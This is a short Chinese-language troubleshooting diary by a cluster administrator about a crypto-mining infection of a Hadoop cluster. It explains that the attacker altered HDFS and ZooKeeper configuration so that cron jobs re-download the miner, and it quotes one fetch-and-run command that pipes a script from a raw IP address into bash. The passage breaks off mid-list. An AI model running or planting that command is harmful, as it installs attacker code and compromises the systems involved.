集群挖矿脚本排查日记

1、事件描述

集群挖矿脚本，这种事情遇到过好几次了，以前的基本上都是通过yarn的8088端口进来的，然后运行很多的application直接撑爆你的cpu，这种只需要关掉8088的外网访问端口基本就能解决。但是这一次遇到一个非常恶心的挖矿脚本，废fa不多说，先上脚本（如图）：


大家可以看到这个脚本是有多恶心，这个还不是最恶心的地方，最恶心的地方是他会修改你集群的hdfs和zookeeper的配置文件，只要你启动相关的任务，他都会去运行一个定时任务来下载这个脚本并运行，相关代码如下：
curl http://149.28.137.164:8220/install.sh|bash
就算你把之前的脚本，定时任务全删了，他依然会通过这个口子进来，你不去仔细找的话，基本是一脸懵逼的样子。然后还会在你启动的每个集群服务的用户下面建立一个定时任务。不过这个矿机脚本不会将cpu直接撑爆，基本会在50%到80%左右徘徊。

2、关键点总结

a、黑客获得root权限（这就很恐怖了）
b、